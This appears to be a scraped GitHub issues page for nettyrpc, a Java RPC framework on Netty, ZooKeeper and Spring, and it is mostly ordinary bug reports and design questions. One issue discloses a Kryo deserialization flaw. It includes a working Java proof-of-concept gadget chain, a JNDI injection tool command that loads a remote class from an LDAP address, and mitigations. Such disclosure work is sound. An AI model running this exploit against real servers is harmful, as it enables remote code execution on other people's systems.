luxiaoxun / nettyrpc Goto Github PK
View Code? Open in Web Editor NEWA simple RPC framework based on Netty, ZooKeeper and Spring
A simple RPC framework based on Netty, ZooKeeper and Spring
既然有了NettyService注解,是不是可以在客户端调用的过程中,不再使用RpcClient对象来调用,
客户端注入@autowire RpcClient rpcClient,每次还要create出对应的proxyService。可以用@NettyService解决这个问题。
测试代码
@test
public void helloPersonTest() {
HelloPersonService helloPersonService = rpcClient.create(HelloPersonService.class);
int num = 5;
List persons = helloPersonService.GetTestPerson("xiaoming", num);
// 只要 大于总client数就行
for(int i=0;i<10; i++) {
helloPersonService.GetTestPerson("aaaaaa"+i, num);
}
System.err.println(persons.size());
List<Person> expectedPersons = new ArrayList<>();
for (int i = 0; i < num; i++) {
expectedPersons.add(new Person(Integer.toString(i), "xiaoming"));
}
assertThat(persons, equalTo(expectedPersons));
for (int i = 0; i<persons.size(); ++i) {
System.out.println(persons.get(i));
}
}
////////////////////////////线程栈//////////////////////////////
"main" #1 prio=5 os_prio=0 tid=0x0000000002039800 nid=0x1dd4 waiting on condition [0x000000000230e000]
java.lang.Thread.State: WAITING (parking)
at sun.misc.Unsafe.park(Native Method)
- parking to wait for <0x000000076f5154a0> (a com.nettyrpc.client.RPCFuture$Sync)
at java.util.concurrent.locks.LockSupport.park(LockSupport.java:175)
at java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(AbstractQueuedSynchronizer.java:836)
at java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireQueued(AbstractQueuedSynchronizer.java:870)
at java.util.concurrent.locks.AbstractQueuedSynchronizer.acquire(AbstractQueuedSynchronizer.java:1199)
at com.nettyrpc.client.RPCFuture.get(RPCFuture.java:47)
at com.nettyrpc.client.proxy.ObjectProxy.invoke(ObjectProxy.java:60)
at com.sun.proxy.$Proxy10.GetTestPerson(Unknown Source)
at com.nettyrpc.test.app.HelloServiceTest.helloPersonTest(HelloServiceTest.java:65)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:497)
at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:47)
at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:44)
at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74)
at org.junit.internal.runners.statements.RunAfters.evaluate(RunAfters.java:27)
at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:83)
at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72)
at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:231)
at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:88)
at org.junit.runners.ParentRunner$3.run(ParentRunner.java:238)
at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:63)
at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:236)
at org.junit.runners.ParentRunner.access$000(ParentRunner.java:53)
at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:229)
at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61)
at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:71)
at org.junit.runners.ParentRunner.run(ParentRunner.java:309)
at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:174)
at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:86)
at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38)
at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:459)
at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:675)
at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:382)
at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:192)
//////////////////////////////////////////////////////////////////////////////////////////
原因:在request数据没有被发送完的时候,调用线程进入了sync的等待队列,状态变成了等待
/////////////////////////////////////////修改方法////////////////////////////////////////
修改RpcClientHandler 的 sendRequest 方法
public RPCFuture sendRequest(RpcRequest request) throws InterruptedException {
final CountDownLatch latch = new CountDownLatch(1);
RPCFuture rpcFuture = new RPCFuture(request);
pendingRPC.put(request.getRequestId(), rpcFuture);
channel.writeAndFlush(request).addListener(new ChannelFutureListener() {
@Override
public void operationComplete(ChannelFuture future) {
latch.countDown();
}
});
latch.await();
return rpcFuture;
}
您好,我想将 “分布式 RPC 框架” 作为我的本科毕业设计的题目,但是不太确定规模和复杂度方面是否合适。能否给我一些建议?非常感谢!
RpcServer
在 InitializingBean
接口的实现中阻塞了, 这样会导致 Spring 无法完成初始化.
例如在 server-spring.xml
中 rpcServer
bean的后面添加bean配置, 新添加的bean会无法加载.
A deserialization vulnerability in NettyRpc v1.2 allows attackers to execute arbitrary commands via sending a crafted RPC request.
Obtain the JNDI injection tool from: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
Use the following command below to establish a JNDI link
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc"
Paste the provided POC code below into the project, ensuring to modify the JNDI URL address!
package com.app.test.client;
import com.netty.rpc.client.RpcClient;
import com.app.test.service.HelloService;
import com.sun.rowset.JdbcRowSetImpl;
import org.apache.commons.beanutils.BeanComparator;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Collections;
import java.util.Comparator;
import java.util.TreeMap;
public class RpcObject {
public static void main(String[] args) throws Exception {
final RpcClient rpcClient = new RpcClient("127.0.0.1:2181");
final HelloService syncClient = rpcClient.createService(HelloService.class, "1.0");
BeanComparator cmp = new BeanComparator("lowestSetBit", Collections.reverseOrder());
// Modify the jndiURL here!
String jndiUrl = "ldap://169.254.197.239:1389/0i9tqe";
Object trig = makeTreeMap(makeJNDIRowSet(jndiUrl), cmp);
setFieldValue(cmp, "property", "databaseMetaData");
syncClient.helloObject(trig);
rpcClient.stop();
}
public static TreeMap<Object, Object> makeTreeMap (Object tgt, Comparator comparator ) throws Exception {
TreeMap<Object, Object> tm = new TreeMap<>(comparator);
Class<?> entryCl = Class.forName("java.util.TreeMap$Entry");
Constructor<?> entryCons = entryCl.getDeclaredConstructor(Object.class, Object.class, entryCl);
entryCons.setAccessible(true);
Field leftF = getField(entryCl, "left");
Field rootF = getField(TreeMap.class, "root");
Object root = entryCons.newInstance(tgt, tgt, null);
leftF.set(root, entryCons.newInstance(tgt, tgt, root));
rootF.set(tm, root);
setFieldValue(tm, "size", 2);
return tm;
}
public static Field getField ( final Class<?> clazz, final String fieldName ) throws Exception {
try {
Field field = clazz.getDeclaredField(fieldName);
if ( field != null )
field.setAccessible(true);
else if ( clazz.getSuperclass() != null )
field = getField(clazz.getSuperclass(), fieldName);
return field;
}
catch ( NoSuchFieldException e ) {
if ( !clazz.getSuperclass().equals(Object.class) ) {
return getField(clazz.getSuperclass(), fieldName);
}
throw e;
}
}
public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
public static JdbcRowSetImpl makeJNDIRowSet (String jndiUrl ) throws Exception {
JdbcRowSetImpl rs = new JdbcRowSetImpl();
rs.setDataSourceName(jndiUrl);
rs.setMatchColumn("foo");
getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);
return rs;
}}
lookup:417, InitialContext (javax.naming)
connect:624, JdbcRowSetImpl (com.sun.rowset)
getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
invokeMethod:2170, PropertyUtilsBean (org.apache.commons.beanutils)
getSimpleProperty:1332, PropertyUtilsBean (org.apache.commons.beanutils)
getNestedProperty:770, PropertyUtilsBean (org.apache.commons.beanutils)
getProperty:846, PropertyUtilsBean (org.apache.commons.beanutils)
getProperty:426, PropertyUtils (org.apache.commons.beanutils)
compare:157, BeanComparator (org.apache.commons.beanutils)
compare:1291, TreeMap (java.util)
put:538, TreeMap (java.util)
read:162, MapSerializer (com.esotericsoftware.kryo.serializers)
read:39, MapSerializer (com.esotericsoftware.kryo.serializers)
readObject:734, Kryo (com.esotericsoftware.kryo)
read:391, DefaultArraySerializers$ObjectArraySerializer (com.esotericsoftware.kryo.serializers)
read:302, DefaultArraySerializers$ObjectArraySerializer (com.esotericsoftware.kryo.serializers)
readObject:734, Kryo (com.esotericsoftware.kryo)
read:125, ObjectField (com.esotericsoftware.kryo.serializers)
read:543, FieldSerializer (com.esotericsoftware.kryo.serializers)
readObject:712, Kryo (com.esotericsoftware.kryo)
deserialize:43, KryoSerializer (com.netty.rpc.serializer.kryo)
decode:42, RpcDecoder (com.netty.rpc.codec)
decodeRemovalReentryProtection:505, ByteToMessageDecoder (io.netty.handler.codec)
callDecode:444, ByteToMessageDecoder (io.netty.handler.codec)
channelRead:283, ByteToMessageDecoder (io.netty.handler.codec)
invokeChannelRead:374, AbstractChannelHandlerContext (io.netty.channel)
invokeChannelRead:360, AbstractChannelHandlerContext (io.netty.channel)
fireChannelRead:352, AbstractChannelHandlerContext (io.netty.channel)
fireChannelRead:328, ByteToMessageDecoder (io.netty.handler.codec)
channelRead:302, ByteToMessageDecoder (io.netty.handler.codec)
invokeChannelRead:374, AbstractChannelHandlerContext (io.netty.channel)
invokeChannelRead:360, AbstractChannelHandlerContext (io.netty.channel)
fireChannelRead:352, AbstractChannelHandlerContext (io.netty.channel)
channelRead:287, IdleStateHandler (io.netty.handler.timeout)
invokeChannelRead:374, AbstractChannelHandlerContext (io.netty.channel)
invokeChannelRead:360, AbstractChannelHandlerContext (io.netty.channel)
fireChannelRead:352, AbstractChannelHandlerContext (io.netty.channel)
channelRead:1422, DefaultChannelPipeline$HeadContext (io.netty.channel)
invokeChannelRead:374, AbstractChannelHandlerContext (io.netty.channel)
invokeChannelRead:360, AbstractChannelHandlerContext (io.netty.channel)
fireChannelRead:931, DefaultChannelPipeline (io.netty.channel)
read:163, AbstractNioByteChannel$NioByteUnsafe (io.netty.channel.nio)
processSelectedKey:700, NioEventLoop (io.netty.channel.nio)
processSelectedKeysOptimized:635, NioEventLoop (io.netty.channel.nio)
processSelectedKeys:552, NioEventLoop (io.netty.channel.nio)
run:514, NioEventLoop (io.netty.channel.nio)
run:1044, SingleThreadEventExecutor$6 (io.netty.util.concurrent)
run:74, ThreadExecutorMap$2 (io.netty.util.internal)
run:30, FastThreadLocalRunnable (io.netty.util.concurrent)
run:745, Thread (java.lang)
Subsequently, KryoSerializer receives the object from com.netty.rpc.codec.RpcRequest (our malicious object) and places it into deserialization without conducting any security checks:
1. Upgrade Kryo to Version 5.0 or Higher:
Upgrade the Kryo library to version 5.0 or a later release to benefit from the latest security enhancements and bug fixes.
2. Strict Outbound Internet Access Control
Due to the prevalence of known attack vectors leveraging JDNI injection to achieve Remote Code Execution (RCE), which requires the remote loading of malicious classes, it is recommended, where feasible without impacting business operations, to implement strict outbound internet access controls on server configurations.
3. Restriction of Access to Server
It is advisable to restrict external access to the server either by utilizing whitelist IP configurations or by closing public-facing ports. This measure aims to reduce the attack surface and potential risks associated with external access to the server.
4. Implementation of Whitelists/Blacklists for Serialization/Deserialization Classes
Establishing whitelists or blacklists for serialization/deserialization classes within the serialization protocol is recommended. This helps to restrict the deserialization of malicious classes. However, it is important to note that using a blacklist may introduce the risk of potential bypasses.
client 支持指定IP+port调用吗
我的想法是,threadPoolExecutor是否应该使用volatile修饰呢。
public static void submit(Runnable task) {
if (threadPoolExecutor == null) {
synchronized (RpcServer.class) {
if (threadPoolExecutor == null) {
threadPoolExecutor = new ThreadPoolExecutor(16, 16, 600L,
TimeUnit.SECONDS, new ArrayBlockingQueue<Runnable>(65536));
}
}
}
threadPoolExecutor.submit(task);
}
server端一直收不到client端的请求,在server端的channelRead0方法里面,始终进不去
static class Sync extends AbstractQueuedSynchronizer {
private static final long serialVersionUID = 1L;
//future status
private final int done = 1;
private final int pending = 0;
@Override
protected boolean tryAcquire(int arg) {
return getState() == done;
}
@Override
protected boolean tryRelease(int arg) {
if (getState() == pending) {
if (compareAndSetState(pending, done)) {
return true;
} else {
return false;
}
} else {
return true;
}
}
public boolean isDone() {
getState();
return getState() == done;
}
}
这一块的实现有什么用意?
我的看法是:
`
protected boolean tryRelease(int releases) {
if (getState() == pending) {
if (compareAndSetState(pending, done)) {
return true;
}
return false;
} else {
return true;
}
}
`
我看里面new了个CountDownLatch,然后又执行了await方法阻塞了执行线程,也就是说,不管怎么样,都会同步执行完RPC请求.get里的timeout抛出异常的机制是完全无效的
LRU负载均衡那里的LinkedHashMap设置Key 和 Value一样为什么不可以直接返回Key,而是要返回Value?
@Override
public final void decode(ChannelHandlerContext ctx, ByteBuf in, List<Object> out) throws Exception {
if (in.readableBytes() < 4) {
return;
}
in.markReaderIndex();
int dataLength = in.readInt();
/*if (dataLength <= 0) {
ctx.close();
}*/
if (in.readableBytes() < dataLength) {
in.resetReaderIndex();
return;
}
byte[] data = new byte[dataLength];
in.readBytes(data);
Object obj = SerializationUtil.deserialize(data, genericClass);
//Object obj = JsonUtil.deserialize(data,genericClass); // Not use this, have some bugs
out.add(obj);
}
我看在pipline里面不是已经使用LengthFieldBasedFrameDecoder来解决粘包半包这个问题了吗,这个decode里面直接反序列化是不是就可以了?
首先,用了TCP长连接你没有解决TCP黏包的问题吧,高并发下使用同一连接会有问题,其次,对于netty来说,本身其就已经开设了几个线程处理网络请求,你在线程里再开设线程去处理请求这明显违背了netty的设计,本身netty的高性能就与他线程数有关,线程里再开设线程势必会造成性能损失。以上是我看完代码之后的一些想法,有可能说错,欢迎交流
` // Close and remove invalid server nodes
for (int i = 0; i < connectedHandlers.size(); ++i) {
RpcClientHandler connectedServerHandler = connectedHandlers.get(i);
SocketAddress remotePeer = connectedServerHandler.getRemotePeer();
if (!newAllServerNodeSet.contains(remotePeer)) {
LOGGER.info("Remove invalid server node " + remotePeer);
RpcClientHandler handler = connectedServerNodes.get(remotePeer);
handler.close();
connectedServerNodes.remove(remotePeer);
connectedHandlers.remove(connectedServerHandler);
}
}`
再次连接同一个connectedServerNode导致connectedHandlers无法移除无效的链接
Caused by: java.lang.IllegalStateException: SpringJUnit4ClassRunner requires JUnit 4.12 or higher.
但是改了JUnit版本也还是不行;
原代码:
String interfaceName = serviceBean.getClass().getAnnotation(RpcService.class).value().getName();
如果这个serviceBean本身是个cglibBean,你这个方法会获取不到RpcService的annotation信息的,使用Spring的AnnotationUtils可以解决
Sync类中调用两次的getState作用是啥
public boolean isDone() {
getState();
return getState() == done;
}
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.2</version>
<configuration>
<source>1.8</source>
<target>1.8</target>
<encoding>UTF-8</encoding>
</configuration>
</plugin>
</plugins>
</build>
您好,目前我的项目需要一个轻量级rpc框架,想问下,你这个能不能直接作为依赖导入使用呢?
删除 com.nettyrpc.client.RpcClientHandler sendRequest 方法中的 channel.writeAndFlush(request); 防止重复调用
@RpcService(HelloService.class)
public class HelloServiceImpl implements HelloService {
int a=0;
@Override
public String hello(String name) {
a++;
System.out.println("调用了"+a);
return "Hello! " + name;
}
@Override
public String hello(Person person) {
return "Hello! " + person.getFirstName() + " " + person.getLastName();
}
}
我将hello方法改了下,看日志发现client请求一次,HelloServiceImpl.hell方法被调用了两次,而且这个方法还有线程同步问题。
调用了1
调用了1
调用了2
调用了3
如题,看了半天源码没太搞懂,如果没有异步回调任务,是不是可以去掉?
remove old那块代码我没看懂,那里不是就不执行吗?而且你要remove old的话,你初始化的linkedHashMap里,你override的removeEldestEntry方法不就已经实现了吗?
如果在RpcClientHandler的channelRead0触发之前就调用了rpcFuture.get(),岂不是直接返回null?这逻辑没问题么?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.